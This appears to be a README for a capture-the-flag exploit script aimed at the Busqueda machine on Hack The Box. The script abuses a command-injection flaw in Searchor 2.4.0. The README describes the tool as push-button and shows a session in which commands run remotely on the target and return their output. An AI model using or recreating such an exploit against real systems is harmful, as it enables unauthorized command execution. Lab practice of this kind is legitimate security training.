This script is for the Busqueda box on HTB, this exploits a vulnerable searcher 2.4.0 that is present. details of the exploit can be viewed here. and here is the github commit of the issue
To use the exploit is quite simple, enter the name of the website and script will do the rest of processing the POST requests and etc. etc. Essentially just a clone-n-play script that does all the work for you
kali@kali ~> python script3.py
Enter the target address (preferred to have name saved in hosts file): searcher.htb
Command: id
uid=1000(svc) gid=1000(svc) groups=1000(svc)
Command: ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr 3 2023 .
drwxr-xr-x 4 root root 4096 Apr 4 2023 ..
-rw-r--r-- 1 www-data www-data 1124 Dec 1 2022 app.py
drwxr-xr-x 8 www-data www-data 4096 May 18 11:49 .git
drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 templates
Command: pwd
/var/www/app